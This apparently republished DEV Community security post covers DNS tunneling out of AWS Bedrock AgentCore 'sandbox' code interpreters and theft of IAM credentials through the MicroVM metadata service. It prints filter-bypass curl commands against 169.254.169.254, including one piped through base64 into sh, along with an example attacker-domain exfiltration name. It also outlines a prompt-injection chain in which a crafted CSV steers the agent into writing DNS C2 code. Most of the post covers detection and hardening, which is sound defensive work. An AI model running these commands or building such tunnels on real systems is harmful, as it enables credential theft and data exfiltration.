DEV Community

FirstPassLab

Posted on • Originally published at firstpasslab.com

DNS Exfiltration from AWS Bedrock "Sandboxed" Code Interpreters — and AWS Says It's Fine

AWS Bedrock AgentCore Code Interpreter lets attackers exfiltrate data via DNS queries even in "Sandbox" mode — and AWS classified it as intended behavior, not a vulnerability.

Researchers from Phantom Labs and Sonrai Security independently demonstrated that DNS resolution bypasses sandbox isolation, enabling credential theft, S3 bucket enumeration, and full C2 channels through the one protocol every firewall allows by default.

If you deploy AI agents with code execution on AWS, the word "sandbox" doesn't mean what you think it means.


How DNS Exfiltration Bypasses Sandbox Isolation

Sandbox mode blocks outbound HTTP, HTTPS, and TCP — but DNS resolution on UDP 53 stays fully functional. Attackers encode stolen data into DNS subdomain labels:

```
c2VjcmV0LWtleQ.attacker-domain.com
```

These queries reach an attacker-controlled authoritative DNS server, carrying credentials, file contents, or bucket names in each request.

The Attack Chain

  1. Malicious input injection — crafted CSV with embedded instructions uploaded for AI analysis
  2. Code manipulation — AI agent generates Python code influenced by the payload
  3. DNS C2 establishment — generated code polls attacker domain via DNS
  4. Command execution — attacker returns commands encoded in DNS responses
  5. Data exfiltration — sensitive data encoded into subsequent DNS queries

At the packet level, this is textbook DNS tunneling:

| Step | Action | Layer |
|------|--------|-------|
| 1 | Sandboxed code calls `socket.getaddrinfo()` | Application |
| 2 | DNS query for `encoded-data.evil.com` | Transport (UDP 53) |
| 3 | Recursive resolver forwards to attacker's NS | DNS infrastructure |
| 4 | Attacker receives data in subdomain labels | Attacker-controlled |
| 5 | Response contains encoded commands in TXT/CNAME | Return path |

Max data per DNS label: 63 bytes (253 bytes total per query). At 100 queries/second, credentials and config files exfiltrate in seconds.


MMDS Credential Theft: The Bigger Problem

Sonrai Security's research reveals something worse: AgentCore Code Interpreters run on Firecracker MicroVMs exposing the MicroVM Metadata Service (MMDS) at 169.254.169.254 — the same endpoint as EC2's IMDS.

AWS implemented two string filters to block access:

  • ://169.254.169.254
  • /latest/meta-data

Both are trivially bypassed:

```bash
# Method 1: Variable splitting
IP="169.254.169.254"
METADATA="meta-data"
curl -s http://$IP/latest/$METADATA/iam/security-credentials/execution_role

# Method 2: Base64 encoding
echo "Y3VybCBodHRwOi8vMTY5LjI1NC4xNjkuMjU0L2xhdGVzdC9tZXRhLWRhdGEv" | base64 -d | sh
```

Once extracted, the attacker assumes the code interpreter's IAM execution role outside the sandbox. The default AgentCore Starter Toolkit role can include:

  • Full DynamoDB access — read/write any table
  • Full Secrets Manager access — retrieve any stored secret
  • S3 read access — enumerate and download any object

AWS Says: "Working as Intended"

AWS reviewed both findings and classified them as intended functionality. Instead of patches, they updated documentation to clarify that Sandbox mode provides "limited external network access."

| AWS Position | Your Security Impact |
|--------------|----------------------|
| DNS resolution is expected in Sandbox mode | Cannot rely on Sandbox to prevent exfiltration |
| MMDS access is by design | IAM credential theft is an accepted risk |
| Shared responsibility model applies | You must implement compensating controls |
| VPC mode is recommended | Additional cost and complexity required |

Practically: Sandbox mode provides less isolation than a zone-based firewall with deny ip any any on the outside interface. At least the firewall actually blocks DNS.


Detecting DNS Tunneling in Cloud Environments

Anomaly Indicators

| Indicator | Normal DNS | DNS Tunneling |
|-----------|------------|---------------|
| Subdomain label length | 8-15 chars | 40-63 chars (max) |
| Query entropy | Low (readable) | High (Base64/hex) |
| Unique subdomains/domain | < 100/hr | 1,000+/hr |
| TXT record queries | < 5% of total | 30-60% of total |
| Query frequency to single domain | Sporadic | Sustained bursts |
| Response size | < 512 bytes | Consistently near limits |
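As an added example (not code from the original post or from either research team), here are the label-length, entropy, TXT-ratio and unique-subdomain indicators from the table above turned into detection logic, run over constructed query log lines that follow the attack chain described earlier. The four-field log format, the registered-domain split on the last two labels and the entropy cutoff of 3.0 bits per character are assumptions.

```python
import math
from collections import Counter, defaultdict
# Constructed sample query log (epoch, source IP, query name, query type); not real traffic.
SAMPLE_LOG = """\
1700000000 10.0.2.15 api.example.com A
1700000001 10.0.2.15 cdn.example.com A
1700000002 10.0.2.15 sts.us-east-1.amazonaws.com A
1700000003 10.0.2.15 c2VjcmV0LWtleQ.attacker-domain.com TXT
1700000003 10.0.2.15 QUtJQUlPU0ZPRE5ON0VYQU1QTEUQUtJQUlPU0ZPRE5ON0VYQU1QTEU.attacker-domain.com TXT
1700000004 10.0.2.15 ZXhhbXBsZS1idWNrZXQtY3VzdG9tZXItcGlp.attacker-domain.com TXT
1700000004 10.0.2.15 cmVwb3J0cy5leGFtcGxlLmNvbQ.attacker-domain.com TXT
1700000005 10.0.2.15 aGVsbG8.attacker-domain.com A
"""
# Cutoffs from the indicator table above; the entropy cutoff (bits/char) is an assumption.
LABEL_LEN_MAX, ENTROPY_MIN, TXT_RATIO_MIN, UNIQUE_SUBS_MAX = 40, 3.0, 0.30, 1000

def shannon_entropy(s):
    """Bits per character: readable names score low, Base64/hex blobs score high."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def profile_domains(log_text):
    """Aggregate per registered domain (last two labels; ignores suffixes like co.uk)."""
    stats = defaultdict(lambda: {"queries": 0, "txt": 0, "subs": set(), "max_label": 0, "entropies": []})
    for line in log_text.splitlines():
        _, _, qname, qtype = line.split()
        labels = qname.strip(".").split(".")
        st, sub = stats[".".join(labels[-2:])], labels[:-2]
        st["queries"] += 1
        st["txt"] += qtype == "TXT"
        if sub:  # only the attacker-chosen part of each name is measured
            st["subs"].add(".".join(sub))
            st["max_label"] = max(st["max_label"], max(map(len, sub)))
            st["entropies"].append(shannon_entropy("".join(sub)))
    return stats

def tunneling_indicators(st):
    """Names of the indicators a domain profile trips, in table order."""
    mean_entropy = sum(st["entropies"]) / len(st["entropies"]) if st["entropies"] else 0.0
    checks = [("long_labels", st["max_label"] >= LABEL_LEN_MAX),
              ("high_entropy", mean_entropy >= ENTROPY_MIN),
              ("txt_heavy", st["txt"] / st["queries"] >= TXT_RATIO_MIN),
              ("many_subdomains", len(st["subs"]) >= UNIQUE_SUBS_MAX)]
    return [name for name, hit in checks if hit]

def flagged_domains(log_text, min_hits=2):
    """Domains tripping at least min_hits indicators; a single indicator is too noisy."""
    return {d: h for d, st in profile_domains(log_text).items()
            if len(h := tunneling_indicators(st)) >= min_hits}
```

On the sample, `flagged_domains(SAMPLE_LOG)` reports only `attacker-domain.com`, tripping the long-label, entropy and TXT-ratio checks; the unique-subdomain rate needs a real hourly window to be meaningful.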

Defense-in-Depth Stack

Layer 1 — DNS Resolution Restriction:

```
! Cisco IOS-XE: Restrict outbound DNS to approved resolvers
ip access-list extended DNS-RESTRICT
 permit udp any host 10.0.1.53 eq 53
 permit udp any host 10.0.1.54 eq 53
 deny udp any any eq 53 log
```

Layer 2 — DNS Inspection: Deploy Cisco Umbrella, Infoblox BloxOne, or Palo Alto DNS Security to analyze query content in real time.

Layer 3 — VPC Network Controls: Deploy code interpreters in VPC mode with explicit security group rules. Route DNS through a controlled resolver with logging.

Layer 4 — IAM Least Privilege: Strip unnecessary permissions from execution roles. Use AgentCore Gateways with Lambda instead of direct AWS API access.


Real-World Risk Scenarios

Supply Chain Data Theft

AI agent processes vendor invoices via Code Interpreter. Malicious invoice contains embedded instructions. The interpreter — with S3 read access — enumerates all buckets and exfiltrates customer PII via DNS. Your firewall logs show normal DNS traffic. Your SIEM sees nothing. The data is gone.

Credential Pivoting

Attacker extracts IAM credentials via MMDS. Those credentials include secretsmanager:GetSecretValue from the Starter Toolkit role. Database credentials, API keys, encryption keys — all from a "sandboxed" environment.

Persistent C2 Channel

Compromised AI agent establishes DNS-based C2 that persists across sessions. Without DNS content inspection, it operates indefinitely below anomaly detection thresholds.


Immediate Actions

  1. Audit all Bedrock AgentCore deployments — identify Sandbox vs. VPC mode usage
  2. Review IAM execution roles — apply least-privilege; remove the default Starter Toolkit role
  3. Deploy DNS content inspection on all egress paths from AI workloads
  4. Enable CloudTrail data events for AgentCore (not logged by default)
  5. Block MMDS access using iptables rules within container/VM configs
  6. Implement SCPs to restrict bedrock-agentcore:CreateCodeInterpreter to authorized roles

The Broader Lesson

DNS has been the blind spot in network security since RFC 1035 in 1987. The protocol never anticipated queries carrying encoded payloads through firewalls. This AWS vulnerability demonstrates a decades-old weakness in a modern context.

This isn't AWS-specific either:

  • Google Cloud Vertex AI code execution faces similar DNS exposure
  • Azure AI sandbox implementations have the same architectural challenge
  • Any container or MicroVM that allows DNS resolution is a potential exfiltration path

As organizations deploy more autonomous AI agents with code execution, the attack surface expands. DNS tunneling detection is no longer optional — it's table stakes.




AI Disclosure: This article was adapted from the original FirstPassLab post with AI assistance. All technical content has been reviewed for accuracy.
